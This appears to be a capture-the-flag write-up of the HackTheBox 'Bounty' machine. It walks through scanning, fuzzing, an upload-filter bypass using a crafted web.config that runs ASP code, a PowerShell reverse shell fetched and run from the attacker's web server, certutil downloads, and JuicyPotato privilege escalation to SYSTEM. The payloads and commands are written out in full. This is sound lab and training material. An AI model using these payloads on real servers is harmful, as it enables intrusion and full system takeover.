HackTheBox - Bounty Writeup

tags: writeup HackTheBox Bounty``aspx``IIS``JuicyPotato``Easy OSCP

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Port Scanning

# Nmap 7.92 scan initiated Sat May 28 05:48:07 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.034s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Bounty
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 28 05:49:46 2022 -- 1 IP address (1 host up) scanned in 98.11 seconds

We can see there's only one port open so we have to enumerate this Web Server.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Enumeration

First we enter into the web and we only se one image.

Now it's time to fuzz the web , I normally use ffuf and in this case you have to take into account that it is an IIS web server so when fuzzing you will have to add extensions that are used in that server such as .aspx, .asp, .config.

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://bounty.htb/FUZZ -fc 404,505,500 -t 100 -e=.aspx,.txt,.log,.jpg,.png | tee directories

After waiting some minutes the fuzzer founds a subdirectorie that allow us to upload files.

Image Not Showing Possible Reasons

• The image file may be corrupted
• The server hosting the image is unavailable
• The image path is incorrect
• The image format is not supported

Learn More →

Explotation

These file upload has some filter:

So to test which extensions are allowed to be uploaded to the web site we will use burpsuite with the intruder tool.

We have to capture the moment when we hit the upload button and we will add the .txt field to the intruder using a list of extensions that we will take from the seclists folder.

Here is the link of the repository:
https://github.com/danielmiessler/SecLists

To install on Kali execute this commands:

sudo apt install seclists

This is the wordlists that we are gonna use in BurpSuite

/usr/share/seclists/Discovery/Web-Content/raft-small-extensions-lowercase.txt

It's time to open Burp Suite but first start the proxy in Firefox:

Select a file with an extension that don't accept the web page like .php .

When we receive the request click on send to Intruder.

Click on clear and after that add the extension, after that at the payloads window select the wordlist that i talked before.

It will look like this.

To be honest after that I didn't get any matches back so I started searching and within hacktricks there is a section on IIS that talks about .config files that redirects you to a post that allows you to run aspx code here and this post that redirects a blog that give us the asp code to execute commands, now we only have to change the whoami command for a reverse in powershell that will auto run downloading itself from a web server that we will mount on port 80.

This is the modified web.config file that downloads the powershell reverse and executes it:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
   <appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10/Invoke-PowerShellTcp.ps1')")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>

The Powershell that we are gonna use is the PowershellTcp from nishang but we are gonna add a line with this content to execute the function and send the reverse to our ip.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 4444

In the file will look like this:

After that save the file and start a python web server in the same folder as Invoke-PowershellTcp.ps1.

python3 -m http.server 80

We have to start a netcat listener in the same port as the nishang reverse, i use rlwrap to try to make it full tty, but not always works.

rlwrap nc -nlvp 4444

Next, we upload the file and load it.

After this the python web server receives a GET solicitude:

And we receive the shell.

Now it's time to Privesc!

⏫Root Privesc

The first thing to see is the systeminfo and the token privileges:

As we can see We have a Windows Server 2008 R2 Datacenter and we have SeImpersonatePrivilege enabled so here we can clearly use JuicyPotato to get a shell with administrator permissions.

So to obtain Administrator Reverse we need some things:

• JuicyPotato Binary
• Python Web Server with the Powershell Reverse Shell Script

To upload the JuicyPotato binary we are gonna use certutil to download it, the command will look like this:

certutil -urlcache -f http://10.10.14.10/JuicyPotato.exe JC.exe

If we run it we see this:

If we execute directly we maybe we have some problems so we need to use a .bat file to execute the reverse

This is the content of rev.bat

powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.10/Invoke-PowerShellTcp.ps1')

In my case it works at the first time but you maybe need to run the binary some times.

Let's explain how works each parameter:

-l is for setting the listening port and it don't matters for this case which port number you use, i used 1337 because is a haxorz number :).

-t is for try the method, in this case I use * because it means it would try both methods, CreateProcessWithTokenW or CreateProcessAsUser.

-c for stablish the CLSID, JuicyPotato use a default CLSID but in this case gives an error so we are gonna use other from the following list.

-p This parameter establish which program will execute the exploit.

And this is important to have in count with the default CLSID will not work so we have to try some CLSID from this list:

https://github.com/decoder-it/juicy-potato/tree/master/CLSID/Windows_Server_2008_R2_Enterprise

After that we receive a shell with authority\system.

And that's all we have root and I finished the machine!

You can find me on: